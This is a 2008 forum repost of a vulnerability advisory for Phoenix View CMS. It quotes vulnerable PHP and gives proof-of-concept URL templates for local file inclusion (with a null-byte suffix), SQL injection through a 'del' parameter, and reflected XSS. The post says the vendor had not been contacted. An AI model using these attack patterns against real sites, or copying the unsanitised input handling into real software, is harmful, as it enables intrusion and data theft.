[RST]Phoenix View CMS - Multiple Vulns [LFI][SQLI][XSS]

tw8 · May 10, 2008

Multe multumiri lui kw3rln ... stie el de ce .

#########################################################################################
Phoenix View CMS <= Pre Alpha2 Multiple Vulnerabilities [LFI]
[SQLI][XSS]
#########################################################################################

Found by : tw8
Date : 8.05.2008
Website && Forum : http://rstcenter.com && http://rstcenter.com/forum/
Bug type : LFI, SQLI & XSS
#########################################################################################

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Phoenix View CMS
Version : <= Pre Alpha2
Vendor : http://sourceforge.net/projects/phoenixviewcms/
Description :

Phoenix View CMS is going to be an easy to use Content-Managemen-System. It's using a
self-written Template-Engine. The CMS will use a self-written API and it's gonna be
easy to write your own plugins and modules.
########################################################################################

Vulnerabilities:
~~~~~~~~~~~~~~~

Vulnerable code #1 in admin/admin_frame.php [LFI]+[XSS]:

----------------------------------------------------------------------------
	if(isset($_GET["ltarget"])) {
	$ltarget=$_GET["ltarget"];
	$_SESSION["lastsecaction"]='';
}
......
	if(!file_exists(SYSTEM_ADMIN_path . "/" . $ltarget . ".php")) {
		printError("System Admin Seite \"" . $ltarget . "\" wurde nicht gefunden.");
	}
	else {
		include SYSTEM_ADMIN_path . $ltarget . ".php";
	}
----------------------------------------------------------------------------
POC #1:
http://www.target.com/path/admin/admin_frame.php?ltarget=[LOCAL FILE]%00
http://www.target.com/path/admin/admin_frame.php?ltarget=[XSS]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable code #2 admin/module/*.php
[SQLI]:

----------------------------------------------------------------------------
	class db {

......

	function query($query,$ressave=false) {
		if($ressave) return mysql_query($query);
		else {
			$this->res = mysql_query($query);
			return $this->res;
		}
	}
......
}
......

	 if(isset($_GET["del"])) {
	$db->query("DELETE from " . SYSTEM_dbpref . "todo where id='".$_GET["del"]."'");
	echo "<font color='green'>Löschen erfolgreich</font>
\n";
}

/*Vulnerable files:
gbuch.admin.php
links.admin.php
menue.admin.php
news.admin.php
todo.admin.php
*/
----------------------------------------------------------------------------
POC #2:
http://www.target.com/path/admin/module/vulnerable_file.php?del=
[SQLI]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerable code #3 admin/module/*.php [XSS]:

----------------------------------------------------------------------------
	<input type='hidden' name='conf' value='<?php if(isset($_GET["conf"])) echo $_GET["conf"];else echo $_POST["conf"]; ?>' />

/*Vulnerable files:
gbuch.admin.php
links.admin.php
menue.admin.php
news.admin.php
todo.admin.php
*/
----------------------------------------------------------------------------
POC #3:
http://www.target.com/path/admin/module/vulnerable_file.php?conf=[XSS]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Status:
~~~~~~~
Vendor has not been contacted yet.
###########################################################################
Shoutz to vladiii, kw3rln, Nemessis, Kenpachi, Moubik, DranaXum, Inside, str0ke & all RST Members.
###########################################################################
Contact:
~~~~~~~
Website: http://rstcenter.com
Forum: http://rstcenter.com/forum
E-Mail: ym_tw8[at]yahoo[dot]com
################################ [ EOF ] ##################################
# milw0rm.com [2008-05-09]

baston · May 14, 2008

cum se umbla cu programul asat ?

Sign In

[RST]Phoenix View CMS - Multiple Vulns [LFI][SQLI][XSS]

Recommended Posts

tw8

baston

Join the conversation

Browse

Activity

Pages